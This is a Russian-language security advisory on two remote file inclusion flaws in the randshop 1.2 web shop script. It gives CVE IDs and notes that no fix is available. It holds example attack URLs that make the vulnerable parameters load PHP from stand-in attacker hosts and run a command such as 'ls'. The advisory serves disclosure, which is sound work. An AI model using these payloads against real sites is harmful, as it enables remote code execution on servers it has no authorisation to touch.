| Дата публикации: | 06.07.2006 |
| Дата изменения: | 06.04.2009 |
| Всего просмотров: | 2662 |
| Опасность: | Высокая |
| Наличие исправления: | Нет |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2006-3537 CVE-2006-3375 CVE-2006-3374 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: | Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | randshop 1.x |
| Уязвимые версии: randshop 1.2 и более ранние версии.
Описание: 1. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”dateiPfad” в сценарии includes/header.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://[target]/[path]/includes/header.inc.php? dateiPfad=http://[attacker]/cmd.txt?&cmd=ls 2. Уязвимость существует из-за недостаточной обработки входных данных в параметре ”incl” в сценарии index.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример: http://victim/randshop/index.php?incl=http://evilscript? URL производителя: www.randshop.com Решение: Способов устранения уязвимости не существует в настоящее время. |
|
| Ссылки: |
randshop <= 1.1.1 Remote File Inclusion Vulnerability file include exploits in randshop v1.2 |